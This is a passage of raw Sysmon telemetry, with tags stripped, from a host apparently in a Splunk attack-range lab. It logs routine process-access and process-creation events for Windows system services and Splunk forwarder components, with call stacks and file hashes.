16:07:08.603{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-552C-6008-DD06-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.603{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552C-6008-DD06-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:08.604{7901BC46-552C-6008-DD06-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.681{7901BC46-552D-6008-DE06-00000000A301}48246932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552D-6008-DE06-00000000A301}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-552D-6008-DE06-00000000A301}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552D-6008-DE06-00000000A301}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:09.541{7901BC46-552D-6008-DE06-00000000A301}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552E-6008-E006-00000000A301}7776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-552E-6008-E006-00000000A301}7776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.978{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552E-6008-E006-00000000A301}7776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.980{7901BC46-552E-6008-E006-00000000A301}7776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.369{7901BC46-552E-6008-DF06-00000000A301}20525632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-552E-6008-DF06-00000000A301}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-552E-6008-DF06-00000000A301}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:10.213{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-552E-6008-DF06-00000000A301}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 